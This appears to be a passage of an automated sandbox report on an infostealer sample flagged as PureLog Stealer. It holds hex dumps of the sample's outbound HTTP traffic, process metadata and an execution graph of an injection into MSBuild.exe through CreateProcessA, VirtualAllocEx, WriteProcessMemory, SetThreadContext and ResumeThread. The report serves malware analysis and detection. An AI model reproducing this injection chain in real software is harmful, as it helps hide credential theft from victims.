                                          2024-05-24 08:26:11 UTC15331OUTData Raw: 1f 5b 02 53 e7 92 ba 8b 42 4c fd 5d 7b 52 2b 6b 1f 39 7f 1b 33 24 00 7e ff 61 14 9e 69 56 89 55 7f 14 bd 64 60 6e f8 49 b9 22 70 e8 1d 1f d3 fa f0 78 c7 35 52 68 d6 31 67 de 15 1f fe 14 34 c6 bd 1b 8a 3c 0a 0d 8d 8c 51 14 1e a6 30 d8 57 c3 3b 51 ca bc 4d 4b 7d 12 49 52 49 2a 33 8b b1 30 d0 d8 3c ce df b2 0f 3b 8b b4 69 42 6f b9 5d ae f3 47 e9 b8 8d f6 e6 1f 9f 90 85 82 5c 5e ae 06 63 81 04 0d f6 91 25 c4 54 7d b8 91 51 05 ac f4 50 cc 29 99 bd 9b fb db c7 2a 75 d8 46 3e ed 3a 08 6e ce 80 03 b1 e3 5d fe 2a cb f3 9f 78 78 45 e0 ab 05 43 c9 b1 3f ee c5 3a dc ea ae 52 ff a1 93 20 ae d8 72 9a 68 12 26 02 ef 6b 52 8d 24 1d 3a 32 37 4a 3b 66 f6 32 3a 99 7e bf d0 80 77 5c b8 e6 a2 56 de d2 99 91 6c 1d 5e 2f 3f 55 e9 58 9e b5 82 0e 95 13 42 ed 50 44 b4 47 dd e9 b4
                                          Data Ascii: [SBL]{R+k93$~aiVUd`nI"px5Rh1g4<Q0W;QMK}IRI*30<;iBo]G\^c%T}QP)*uF>:n]*xxEC?:R rh&kR$:27J;f2:~w\Vl^/?UXBPDG
                                          2024-05-24 08:26:11 UTC15331OUTData Raw: 9f 4b 24 30 ff 36 c1 62 29 36 ed 8e 87 f0 25 5c 73 70 f8 d1 d9 9d 0c a7 93 3f 18 2e 1f 70 f6 30 9d 97 03 be 93 eb 87 6b e2 7e 9c 30 53 26 76 df cd 37 fe 85 3a bd 16 ab b7 3e c1 4b 34 89 f4 d5 e3 a3 b1 27 b3 ef 61 81 ef 8f 3a f3 40 20 51 53 d9 27 4b ab ae d4 08 f1 1f 5e 75 fb a1 58 f7 c0 31 22 30 dc 9f 4a fc d2 1f 44 a5 40 58 b4 a0 e8 c8 e7 a0 a2 cf 81 03 9f 54 b4 6f af fc e9 ec dc 99 3e ab 00 2a 54 21 8d 05 e2 f3 7f b4 3c 17 b5 7b 92 90 42 3d d2 57 6b 5c aa 17 32 91 b8 d0 59 6e eb 5d b3 11 b8 fe c5 ce eb d9 35 e0 53 5c f7 38 61 eb c2 5b 61 a1 24 03 1e 74 ee 70 78 c3 67 f4 2f 49 5b bb 14 ed bd 10 da e1 99 99 f9 b5 be 1f bb 84 83 9f de fe eb 7f 3c 03 c9 50 f2 ca 0d 08 ad 28 9f 10 6b 25 d6 1d e2 06 3a b7 44 59 3d 8d f0 ee 40 72 ee ad 90 7e 29 c4 59 57 4a 00
                                          Data Ascii: K$06b)6%\sp?.p0k~0S&v7:>K4'a:@ QS'K^uX1"0JD@XTo>*T!<{B=Wk\2Yn]5S\8a[a$tpxg/I[<P(k%:DY=@r~)YWJ
                                          2024-05-24 08:26:11 UTC15331OUTData Raw: 67 93 d5 b6 33 71 3e 3d 28 58 1d 48 97 6c 49 95 30 67 e6 bb 70 aa 3d 88 c7 cb 3b ee 88 e6 d5 9f 19 8e 8b 49 be 57 b2 9c fd e0 c8 f9 d7 e7 1a 41 20 1c 04 07 7b 40 97 e2 73 b3 10 7b a0 e3 4f ae 3b 1c 71 47 80 76 38 c6 25 2d 15 16 a0 f9 b4 e9 61 42 df a3 88 55 a8 35 aa 9c 41 72 a8 e8 e6 4d 5d 5b da f6 dd 71 09 f0 92 81 7e 2d 8f 1f 24 1f 2a 05 ed f1 64 76 12 20 a4 91 41 28 f8 cb 2e 73 50 8e 39 36 1d 21 c5 9c b3 50 f2 fc 59 1f 8d 1d ae 65 6f af 65 0a c8 b0 1c 68 34 b6 f3 c5 ad ef d8 63 00 ff 6e 38 fc 95 e5 6b e0 f3 df c3 c2 49 40 90 21 b7 31 83 dc 9b 10 33 e0 b6 15 2f 70 0d c2 00 41 28 82 b9 d1 9b 93 ae 13 64 ae 00 e8 13 fc 86 e7 5c e1 fd e8 5b b5 cc f4 bf 20 b0 35 8f 74 dc 08 d1 95 4a 47 88 fa 61 14 1c cd 7c 7f ab 44 20 d4 7a fa 9a f5 b3 17 39 c1 a6 42 95 6b
                                          Data Ascii: g3q>=(XHlI0gp=;IWA {@s{O;qGv8%-aBU5ArM][q~-$*dv A(.sP96!PYeoeh4cn8kI@!13/pA(d\[ 5tJGa|D z9Bk
                                          2024-05-24 08:26:11 UTC15331OUTData Raw: ab 63 3a 15 15 a6 ea 81 56 b2 ed 1e d6 30 ce af f4 de 4a 36 d8 dd 66 88 b6 63 ea 61 05 00 9b 13 f7 00 c1 be ea 59 3e f8 a4 45 28 f6 4b f2 36 55 ef e9 3b c5 a0 ce 15 45 35 9d 85 58 52 9c 86 6f 84 a3 23 d5 11 05 28 6a 94 c4 f9 ac 12 74 97 c4 c7 c6 3a ca 1d 54 e3 df 84 fb 8c 52 13 11 30 dd 47 c5 86 c1 91 98 28 fb e9 9a fd 47 fb 4e 84 ca 0f 65 96 60 27 df a3 cc d3 0d ac f0 b9 c5 02 6f 99 d2 0e 35 b1 04 57 00 cb 98 b9 7d 35 3b 48 35 35 67 8e af 6f 21 91 15 f6 8d 52 87 e7 6a 76 67 e3 17 49 31 14 d7 2d fc 76 1d 2b e0 38 30 18 c7 08 14 ac ad c5 40 e0 72 f8 80 93 22 b4 b2 87 c9 e2 2d 16 0d 6c cc 5c f9 6b fd d4 b9 c6 bb dc 3f 0e 6b c5 86 17 7e 36 f3 d4 ac 56 eb f9 68 82 89 1c f8 c4 1e 68 b4 2a b2 88 09 cb 64 a5 00 db ae 77 98 c3 50 a6 e1 1a 5e 08 e2 15 be d8 63 da
                                          Data Ascii: c:V0J6fcaY>E(K6U;E5XRo#(jt:TR0G(GNe`'o5W}5;H55go!RjvgI1-v+80@r"-l\k?k~6Vhh*dwP^c
                                          2024-05-24 08:26:11 UTC15331OUTData Raw: 70 f7 30 24 76 d0 56 7e 3a 6b f0 be ff 64 54 58 34 3b b0 d1 13 55 78 1c 3a d1 8e 66 49 b5 cc c9 34 37 35 dc e8 f8 65 c9 6c f4 90 25 39 e1 b2 ee 27 8e 8b 51 1b a2 da 85 9a 2d 68 80 79 65 f5 a3 48 85 66 8a fb d6 07 d3 55 4e 62 88 83 39 5e 5d d6 5a b2 d6 b3 88 88 47 8a f3 bf 19 50 f7 9f 86 e8 b9 c7 d5 0b 47 48 ae f2 86 65 a6 ec f6 e1 d5 1f c4 5f 3f 53 e5 0c ac 29 78 7e e9 01 d8 7c 90 25 1a a2 26 ab 14 f9 be ff c0 ae 70 1b d2 85 2f a6 15 1c 9e 11 82 18 b6 ab 3b 7d da f0 81 f0 27 de c5 ce 6e c8 29 e7 bb 7d 4f d7 ee 7e ed 94 e9 b9 79 87 7c 70 79 89 0e 9a f9 f9 0c 0d e4 ef 45 c5 66 77 92 51 4c 57 a6 db 87 47 ab 4d 74 03 aa ca 9f 0f 13 ed cb 1f d0 8d 80 82 87 f0 19 4f 24 ca 79 41 7c 29 4c 4b 8e 32 dd 5d 5d 26 91 39 2d 7f da ad f4 a7 99 19 a8 f9 a0 4a 88 d8 91 f9
                                          Data Ascii: p0$vV~:kdTX4;Ux:fI475el%9'Q-hyeHfUNb9^]ZGPGHe_?S)x~|%&p/;}'n)}O~y|pyEfwQLWGMtO$yA|)LK2]]&9-J
                                          2024-05-24 08:26:11 UTC15331OUTData Raw: 3e d7 8e a4 93 c2 bb 21 7a d1 9f c7 9c df 44 c6 d3 3c 7d 10 18 0c 60 4f 3d b0 d6 82 00 c6 cb b2 68 40 9b 06 8c 4a 5e df c8 22 4d 3a 52 9f 6e 3d 4f e3 4d 50 e7 73 a0 e2 39 1a ac 35 6e f7 f9 3d fd e3 cd 37 02 95 fd 37 74 ac de dd c9 84 fe c6 c8 cc d7 1b a2 df 8c 84 ff dd 92 f8 ef 20 a2 a7 f2 3c 1e dd 24 02 de 47 51 33 e9 8c 0b 7c f0 53 84 df 3d 14 38 5d 8e f6 59 da 81 29 10 5b 9d 74 c6 41 9e 92 07 77 94 38 5c 50 df 51 27 c2 56 6b 5e cc 3d 18 13 2b 8b 47 f1 02 31 94 10 4a 77 29 3b 71 e4 ae a5 0c be 3a f0 18 c4 51 37 77 63 3e aa 0e ff f2 ab 3a dc d6 c1 60 fe 8f a1 c1 ea 73 89 72 b9 1c 42 2e 23 07 19 2d 0a 5e 50 b2 f3 6f 70 bc 45 37 3e b9 a1 e0 81 97 59 ba 57 2e 83 5e 11 4e 22 3f 78 ff 9f 0a 92 7e 5c 1b 94 4b 80 02 44 18 6f ea b8 ba 18 94 21 61 dd 17 b0 b3 41
                                          Data Ascii: >!zD<}`O=h@J^"M:Rn=OMPs95n=77t <$GQ3|S=8]Y)[tAw8\PQ'Vk^=+G1Jw);q:Q7wc>:`srB.#-^PopE7>YW.^N"?x~\KDo!aA
                                          2024-05-24 08:26:13 UTC806INHTTP/1.1 200 OK
                                          Date: Fri, 24 May 2024 08:26:13 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=9q3ari1bglbmbvpuleg293vf08; expires=Tue, 17-Sep-2024 02:12:52 GMT; Max-Age=9999999; path=/
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMm2yYhZW8EJlQERe2NouHdfnHxpI8PmfTFEDbfDgwiaNbVtPPmWCuBDPYb8tX873OWHN7nj5cAXEiOxXRl%2BrPHXbkyTkKua5sUZ5bwERN0okuwIqjV9Zmi17B0mF4rb%2FE1XYe5DKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 888be63e1b764251-EWR
                                          alt-svc: h3=":443"; ma=86400


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:04:25:59
                                          Start date:24/05/2024
                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe"
                                          Imagebase:0x3f0000
                                          File size:4'779'216 bytes
                                          MD5 hash:99BBA7A8FB2A5F15924D1673CFE3A72B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1979414026.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:04:26:00
                                          Start date:24/05/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                          Imagebase:0xaf0000
                                          File size:262'432 bytes
                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:7.1%
                                            Dynamic/Decrypted Code Coverage:7.3%
                                            Signature Coverage:8.7%
                                            Total number of Nodes:1320
                                            Total number of Limit Nodes:52
                                            execution_graph 52856 7111d40 52857 7111d63 52856->52857 52864 6ee0f14 52857->52864 52869 6ee0eb3 52857->52869 52858 7111d7b 52874 6ee26db 52858->52874 52903 6ee26f8 52858->52903 52859 7111dbd 52865 6ee0f15 52864->52865 52866 6ee19c1 52865->52866 52932 7111de0 52865->52932 52936 7111dd9 52865->52936 52866->52858 52871 6ee0eb8 52869->52871 52870 6ee19c1 52870->52858 52871->52870 52872 7111de0 340 API calls 52871->52872 52873 7111dd9 340 API calls 52871->52873 52872->52870 52873->52870 52875 6ee26f5 52874->52875 52983 7112100 52875->52983 52987 71120f4 52875->52987 52876 6ee28de 52878 6ee29cb 52876->52878 52887 7112600 Wow64SetThreadContext 52876->52887 52888 71125f9 Wow64SetThreadContext 52876->52888 52877 6ee2a0c 52891 7112700 VirtualAllocEx 52877->52891 52892 71126f9 VirtualAllocEx 52877->52892 52878->52859 52879 6ee2a45 52879->52878 52899 7112820 WriteProcessMemory 52879->52899 52900 7112819 WriteProcessMemory 52879->52900 52880 6ee2cbb 52881 6ee2d0f 52880->52881 52895 7112600 Wow64SetThreadContext 52880->52895 52896 71125f9 Wow64SetThreadContext 52880->52896 52893 7112820 WriteProcessMemory 52881->52893 52894 7112819 WriteProcessMemory 52881->52894 52882 6ee2b54 52882->52880 52897 7112820 WriteProcessMemory 52882->52897 52898 7112819 WriteProcessMemory 52882->52898 52883 6ee2da8 52884 6ee2df3 52883->52884 52901 7112600 Wow64SetThreadContext 52883->52901 52902 71125f9 Wow64SetThreadContext 52883->52902 52885 71129d0 ResumeThread 52884->52885 52886 71129c8 ResumeThread 52884->52886 52885->52878 52886->52878 52887->52877 52888->52877 52891->52879 52892->52879 52893->52883 52894->52883 52895->52881 52896->52881 52897->52882 52898->52882 52899->52882 52900->52882 52901->52884 52902->52884 52904 6ee272b 52903->52904 52922 7112100 CreateProcessA 52904->52922 52923 71120f4 CreateProcessA 52904->52923 52905 6ee28de 52907 6ee29cb 52905->52907 52991 71125f9 52905->52991 52995 7112600 52905->52995 52906 6ee2a0c 52998 71126f9 52906->52998 53002 7112700 52906->53002 52907->52859 52908 6ee2a45 52908->52907 53005 7112820 52908->53005 53009 7112819 52908->53009 52909 6ee2cbb 52910 6ee2d0f 52909->52910 52928 7112600 Wow64SetThreadContext 52909->52928 52929 71125f9 Wow64SetThreadContext 52909->52929 52926 7112820 WriteProcessMemory 52910->52926 52927 7112819 WriteProcessMemory 52910->52927 52911 6ee2b54 52911->52909 52930 7112820 WriteProcessMemory 52911->52930 52931 7112819 WriteProcessMemory 52911->52931 52912 6ee2da8 52913 6ee2df3 52912->52913 52916 7112600 Wow64SetThreadContext 52912->52916 52917 71125f9 Wow64SetThreadContext 52912->52917 53013 71129c8 52913->53013 53017 71129d0 52913->53017 52916->52913 52917->52913 52922->52905 52923->52905 52926->52912 52927->52912 52928->52910 52929->52910 52930->52911 52931->52911 52933 7111e4b 52932->52933 52940 6cec3eb0 52933->52940 52934 7111e74 52934->52866 52937 7111e4b 52936->52937 52939 6cec3eb0 340 API calls 52937->52939 52938 7111e74 52938->52866 52939->52938 52941 6cef9bb5 77 API calls 52940->52941 52942 6cec3f11 52941->52942 52943 6cef9bb5 77 API calls 52942->52943 52944 6cec3f36 52943->52944 52945 6cea5050 77 API calls 52944->52945 52946 6cec3f50 52945->52946 52947 6cef9bb5 77 API calls 52946->52947 52948 6cec3f57 52947->52948 52949 6cea5050 77 API calls 52948->52949 52950 6cec3f71 52949->52950 52951 6cef9bb5 77 API calls 52950->52951 52952 6cec3f78 52951->52952 52953 6cea5050 77 API calls 52952->52953 52954 6cec3f92 52953->52954 52955 6cef9bb5 77 API calls 52954->52955 52956 6cec3fab 52955->52956 52957 6cec4031 52956->52957 52958 6cec3fb2 52956->52958 52981 6cef9533 66 API calls std::exception::_Copy_str 52957->52981 52960 6cea16b0 340 API calls 52958->52960 52965 6cec3fdc ctype 52960->52965 52961 6cec4047 52982 6cefac75 RaiseException 52961->52982 52963 6cec405e 52964 6cef9bb5 77 API calls 52963->52964 52966 6cec40b5 52964->52966 52965->52934 52967 6cef9bb5 77 API calls 52966->52967 52968 6cec40d8 52967->52968 52969 6cea5050 77 API calls 52968->52969 52970 6cec40f2 52969->52970 52971 6cef9bb5 77 API calls 52970->52971 52972 6cec40f9 52971->52972 52973 6cea5050 77 API calls 52972->52973 52974 6cec4113 52973->52974 52975 6cef9bb5 77 API calls 52974->52975 52976 6cec411a 52975->52976 52977 6cea5050 77 API calls 52976->52977 52978 6cec4134 52977->52978 52979 6cea16b0 340 API calls 52978->52979 52980 6cec4169 ctype 52979->52980 52980->52934 52981->52961 52982->52963 52985 711217e CreateProcessA 52983->52985 52986 71123e4 52985->52986 52988 7112100 CreateProcessA 52987->52988 52990 71123e4 52988->52990 52992 7112600 Wow64SetThreadContext 52991->52992 52994 711269d 52992->52994 52994->52906 52996 7112648 Wow64SetThreadContext 52995->52996 52997 711269d 52996->52997 52997->52906 52999 7112700 VirtualAllocEx 52998->52999 53001 71127be 52999->53001 53001->52908 53003 7112748 VirtualAllocEx 53002->53003 53004 71127be 53003->53004 53004->52908 53006 7112870 WriteProcessMemory 53005->53006 53008 7112907 53006->53008 53008->52911 53010 7112820 WriteProcessMemory 53009->53010 53012 7112907 53010->53012 53012->52911 53014 71129d0 ResumeThread 53013->53014 53016 7112a5f 53014->53016 53016->52907 53018 7112a15 ResumeThread 53017->53018 53019 7112a5f 53018->53019 53019->52907 51680 6cefa42d 51681 6cefa4b8 type_info::_Name_base 51680->51681 51682 6cefa438 51680->51682 51682->51681 51685 6cefa468 51682->51685 51688 6cefa2ab 51682->51688 51684 6cefa2ab __CRT_INIT@12 149 API calls 51684->51681 51685->51681 51686 6cefa2ab __CRT_INIT@12 149 API calls 51685->51686 51687 6cefa498 51685->51687 51686->51687 51687->51681 51687->51684 51689 6cefa2b7 type_info::_Name_base 51688->51689 51690 6cefa2bf 51689->51690 51691 6cefa339 51689->51691 51740 6cefe904 HeapCreate 51690->51740 51693 6cefa33f 51691->51693 51694 6cefa39a 51691->51694 51700 6cefa35d 51693->51700 51707 6cefa2c8 type_info::_Name_base 51693->51707 51750 6cefd4e7 66 API calls _doexit 51693->51750 51695 6cefa39f 51694->51695 51696 6cefa3f8 51694->51696 51755 6cefe948 TlsGetValue 51695->51755 51696->51707 51761 6cefec2f 79 API calls __freefls@4 51696->51761 51697 6cefa2c4 51699 6cefa2cf 51697->51699 51697->51707 51741 6cefec9d 86 API calls 4 library calls 51699->51741 51705 6cefa371 51700->51705 51751 6cefdd67 67 API calls ___endstdio 51700->51751 51754 6cefa384 70 API calls __mtterm 51705->51754 51707->51685 51709 6cefa2d4 __RTC_Initialize 51712 6cefa2d8 51709->51712 51719 6cefa2e4 GetCommandLineA 51709->51719 51711 6cefa3b0 51711->51707 51714 6cefa3bc DecodePointer 51711->51714 51742 6cefe922 HeapDestroy 51712->51742 51713 6cefa367 51752 6cefe97c 70 API calls ___endstdio 51713->51752 51721 6cefa3d1 51714->51721 51717 6cefa2dd 51717->51707 51718 6cefa36c 51753 6cefe922 HeapDestroy 51718->51753 51743 6ceffc46 71 API calls 2 library calls 51719->51743 51724 6cefa3ec 51721->51724 51725 6cefa3d5 51721->51725 51723 6cefa2f4 51744 6cefdb22 73 API calls __calloc_crt 51723->51744 51760 6cef9d2c 66 API calls __dosmaperr 51724->51760 51759 6cefe9b9 66 API calls 4 library calls 51725->51759 51729 6cefa2fe 51731 6cefa302 51729->51731 51746 6ceffb8b 95 API calls 3 library calls 51729->51746 51730 6cefa3dc GetCurrentThreadId 51730->51707 51745 6cefe97c 70 API calls ___endstdio 51731->51745 51734 6cefa30e 51735 6cefa322 51734->51735 51747 6ceff915 94 API calls 6 library calls 51734->51747 51735->51717 51749 6cefdd67 67 API calls ___endstdio 51735->51749 51738 6cefa317 51738->51735 51748 6cefd2fa 77 API calls 4 library calls 51738->51748 51740->51697 51741->51709 51742->51717 51743->51723 51744->51729 51745->51712 51746->51734 51747->51738 51748->51735 51749->51731 51750->51700 51751->51713 51752->51718 51753->51705 51754->51707 51756 6cefe95d DecodePointer TlsSetValue 51755->51756 51757 6cefa3a4 51755->51757 51756->51757 51758 6cefcb28 66 API calls __calloc_crt 51757->51758 51758->51711 51759->51730 51760->51717 51761->51707 51762 6cec16af 51763 6cec16b4 51762->51763 51764 6cec170f 51763->51764 51812 6cef9bb5 51763->51812 51766 6cec1769 51764->51766 51769 6cef9bb5 77 API calls 51764->51769 51768 6cec17c3 51766->51768 51772 6cef9bb5 77 API calls 51766->51772 51771 6cec181d 51768->51771 51777 6cef9bb5 77 API calls 51768->51777 51773 6cec1727 51769->51773 51770 6cec16e9 51829 6cea8400 51770->51829 51775 6cec1877 51771->51775 51780 6cef9bb5 77 API calls 51771->51780 51778 6cec1781 51772->51778 51774 6cec1743 51773->51774 51779 6cebea40 78 API calls 51773->51779 51785 6cea8400 77 API calls 51774->51785 51783 6cec18d1 51775->51783 51788 6cef9bb5 77 API calls 51775->51788 51781 6cec17db 51777->51781 51787 6cebea40 78 API calls 51778->51787 51793 6cec179d 51778->51793 51779->51774 51784 6cec1835 51780->51784 51791 6cebea40 78 API calls 51781->51791 51800 6cec17f7 51781->51800 51797 6cebea40 78 API calls 51784->51797 51799 6cec1851 51784->51799 51790 6cec175f 51785->51790 51787->51793 51794 6cec188f 51788->51794 51789 6cea8400 77 API calls 51796 6cec17b9 51789->51796 51838 6cea80b0 67 API calls ctype 51790->51838 51791->51800 51793->51789 51795 6cec18ab 51794->51795 51802 6cebea40 78 API calls 51794->51802 51806 6cea8400 77 API calls 51795->51806 51839 6cea80b0 67 API calls ctype 51796->51839 51797->51799 51804 6cea8400 77 API calls 51799->51804 51801 6cea8400 77 API calls 51800->51801 51805 6cec1813 51801->51805 51802->51795 51807 6cec186d 51804->51807 51840 6cea80b0 67 API calls ctype 51805->51840 51809 6cec18c7 51806->51809 51841 6cea80b0 67 API calls ctype 51807->51841 51842 6cea80b0 67 API calls ctype 51809->51842 51814 6cef9bbf 51812->51814 51815 6cec16cd 51814->51815 51819 6cef9bdb std::exception::exception 51814->51819 51843 6cef9d66 51814->51843 51860 6cefc86e DecodePointer 51814->51860 51815->51770 51824 6cebea40 51815->51824 51817 6cef9c19 51862 6cef95c1 66 API calls std::exception::operator= 51817->51862 51819->51817 51861 6cef9af4 76 API calls __cinit 51819->51861 51820 6cef9c23 51863 6cefac75 RaiseException 51820->51863 51823 6cef9c34 51825 6cef9bb5 77 API calls 51824->51825 51826 6cebea6b 51825->51826 51827 6cebea7e SysAllocString 51826->51827 51828 6cebea99 51826->51828 51827->51828 51828->51770 51830 6cef9bb5 77 API calls 51829->51830 51831 6cea840d 51830->51831 51832 6cea8416 51831->51832 51872 6cef9533 66 API calls std::exception::_Copy_str 51831->51872 51837 6cea80b0 67 API calls ctype 51832->51837 51834 6cea844e 51873 6cefac75 RaiseException 51834->51873 51836 6cea8463 51837->51764 51838->51766 51839->51768 51840->51771 51841->51775 51842->51783 51844 6cef9de3 51843->51844 51858 6cef9d74 51843->51858 51870 6cefc86e DecodePointer 51844->51870 51846 6cef9de9 51871 6cefd7d8 66 API calls __getptd_noexit 51846->51871 51847 6cef9d7f 51847->51858 51864 6cefd74e 66 API calls __NMSG_WRITE 51847->51864 51865 6cefd59f 66 API calls 6 library calls 51847->51865 51866 6cefd279 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 51847->51866 51850 6cef9da2 RtlAllocateHeap 51852 6cef9ddb 51850->51852 51850->51858 51852->51814 51853 6cef9dcf 51868 6cefd7d8 66 API calls __getptd_noexit 51853->51868 51857 6cef9dcd 51869 6cefd7d8 66 API calls __getptd_noexit 51857->51869 51858->51847 51858->51850 51858->51853 51858->51857 51867 6cefc86e DecodePointer 51858->51867 51860->51814 51861->51817 51862->51820 51863->51823 51864->51847 51865->51847 51867->51858 51868->51857 51869->51852 51870->51846 51871->51852 51872->51834 51873->51836 51874 6cebe2ce 51875 6cef9bb5 77 API calls 51874->51875 51876 6cebe2d5 51875->51876 51877 6cebe2ee 51876->51877 51931 6cec1fd0 51876->51931 51879 6cebe343 51877->51879 51882 6cef9bb5 77 API calls 51877->51882 51880 6cebe360 51879->51880 51881 6cebe3a6 51879->51881 51883 6cef9bb5 77 API calls 51880->51883 51885 6cef9bb5 77 API calls 51881->51885 51930 6cebe564 ctype 51881->51930 51884 6cebe327 51882->51884 51886 6cebe367 51883->51886 51956 6cebeae0 51884->51956 51889 6cebe400 51885->51889 51971 6cec1910 78 API calls 2 library calls 51886->51971 51893 6cef9bb5 77 API calls 51889->51893 51890 6cebe76e 51892 6cebe384 51972 6cec1b20 11 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 51892->51972 51894 6cebe428 51893->51894 51973 6cea5050 51894->51973 51896 6cebe399 51896->51881 51898 6cebe442 51899 6cef9bb5 77 API calls 51898->51899 51900 6cebe449 51899->51900 51901 6cea5050 77 API calls 51900->51901 51902 6cebe463 51901->51902 51903 6cef9bb5 77 API calls 51902->51903 51904 6cebe46a 51903->51904 51905 6cea5050 77 API calls 51904->51905 51906 6cebe484 51905->51906 51907 6cef9bb5 77 API calls 51906->51907 51908 6cebe48b 51907->51908 51909 6cea5050 77 API calls 51908->51909 51910 6cebe4a5 51909->51910 51911 6cef9bb5 77 API calls 51910->51911 51912 6cebe4ac 51911->51912 51913 6cea5050 77 API calls 51912->51913 51914 6cebe4c6 51913->51914 51915 6cebe4d3 51914->51915 51981 6cef919e 67 API calls 3 library calls 51914->51981 51917 6cef9bb5 77 API calls 51915->51917 51918 6cebe4e3 51917->51918 51919 6cea5050 77 API calls 51918->51919 51920 6cebe4fd 51919->51920 51921 6cef9bb5 77 API calls 51920->51921 51922 6cebe504 51921->51922 51923 6cea5050 77 API calls 51922->51923 51924 6cebe51e 51923->51924 51925 6cef9bb5 77 API calls 51924->51925 51926 6cebe525 51925->51926 51927 6cea5050 77 API calls 51926->51927 51928 6cebe53f 51927->51928 51982 6cea16b0 51928->51982 52046 6cef948b 51930->52046 51932 6cef9bb5 77 API calls 51931->51932 51933 6cec2013 51932->51933 51934 6cec2020 51933->51934 51935 6cec21f3 51933->51935 52054 6cec6480 51934->52054 52088 6cef9533 66 API calls std::exception::_Copy_str 51935->52088 51938 6cec220b 52089 6cefac75 RaiseException 51938->52089 51940 6cec2226 51941 6cec206c 52070 6ce935f0 51941->52070 51943 6cec216e 52081 6cec2300 51943->52081 51945 6cec2194 51946 6cec2300 77 API calls 51945->51946 51947 6cec21a0 51946->51947 51948 6cec2300 77 API calls 51947->51948 51949 6cec21ad 51948->51949 51950 6cec2300 77 API calls 51949->51950 51951 6cec21ba 51950->51951 51952 6cec2300 77 API calls 51951->51952 51953 6cec21c6 51952->51953 51954 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 51953->51954 51955 6cec21ef 51954->51955 51955->51877 51957 6cef9bb5 77 API calls 51956->51957 51958 6cebeb17 51957->51958 51959 6cebf4c9 51958->51959 51960 6cebeb22 51958->51960 52142 6cef9533 66 API calls std::exception::_Copy_str 51959->52142 52134 6cefa25a GetSystemTimeAsFileTime 51960->52134 51962 6cebf4dc 52143 6cefac75 RaiseException 51962->52143 51965 6cebf4f1 51966 6cebeb5b 52136 6cef9dfa 51966->52136 51971->51892 51972->51896 51974 6cea505d 51973->51974 51975 6cea5091 51973->51975 51974->51975 51976 6cea5066 51974->51976 51978 6cea509d 51975->51978 52169 6cea5110 77 API calls std::_Xinvalid_argument 51975->52169 51980 6cea507a 51976->51980 52168 6cea5110 77 API calls std::_Xinvalid_argument 51976->52168 51978->51898 51980->51898 51981->51915 51983 6cef9bb5 77 API calls 51982->51983 51984 6cea1706 51983->51984 51985 6cea1c39 51984->51985 51986 6cea1711 51984->51986 52222 6cef9533 66 API calls std::exception::_Copy_str 51985->52222 52170 6cea2d70 51986->52170 51990 6cea1c48 52223 6cefac75 RaiseException 51990->52223 51992 6cea2d70 77 API calls 51994 6cea1788 51992->51994 51993 6cea1c5d 51995 6cea2d70 77 API calls 51994->51995 51996 6cea17a9 51995->51996 51997 6cea2d70 77 API calls 51996->51997 51998 6cea17ca 51997->51998 51999 6cea2d70 77 API calls 51998->51999 52000 6cea17e6 51999->52000 52001 6cea2d70 77 API calls 52000->52001 52002 6cea182f 52001->52002 52003 6cea2d70 77 API calls 52002->52003 52004 6cea1878 52003->52004 52005 6cea2d70 77 API calls 52004->52005 52006 6cea18c6 52005->52006 52007 6cea2d70 77 API calls 52006->52007 52008 6cea18e7 52007->52008 52009 6cea2d70 77 API calls 52008->52009 52010 6cea1900 52009->52010 52011 6cea2d70 77 API calls 52010->52011 52012 6cea1946 52011->52012 52013 6cea2d70 77 API calls 52012->52013 52014 6cea198f 52013->52014 52015 6cea2d70 77 API calls 52014->52015 52016 6cea19d3 52015->52016 52017 6cea2d70 77 API calls 52016->52017 52018 6cea1a05 52017->52018 52178 6cea3b30 52018->52178 52021 6cea2d70 77 API calls 52023 6cea1a21 52021->52023 52022 6cea2d70 77 API calls 52024 6cea1a82 52022->52024 52023->52022 52187 6cea3bd0 52024->52187 52027 6cea2d70 77 API calls 52028 6cea1a9e 52027->52028 52029 6cea2d70 77 API calls 52028->52029 52030 6cea1aec 52029->52030 52196 6cea2a80 52030->52196 52032 6cea1b4c 52033 6cea1b62 52032->52033 52219 6cef919e 67 API calls 3 library calls 52032->52219 52202 6cec30c0 52033->52202 52206 6cea69e0 52033->52206 52210 6cec42e0 52033->52210 52214 6cea6850 52033->52214 52034 6cea1b58 52220 6cef9125 67 API calls 2 library calls 52034->52220 52038 6cea1b00 52038->52032 52038->52034 52039 6cea1b6d ctype 52038->52039 52218 6cea2e60 77 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 52038->52218 52221 6cea3530 67 API calls 52039->52221 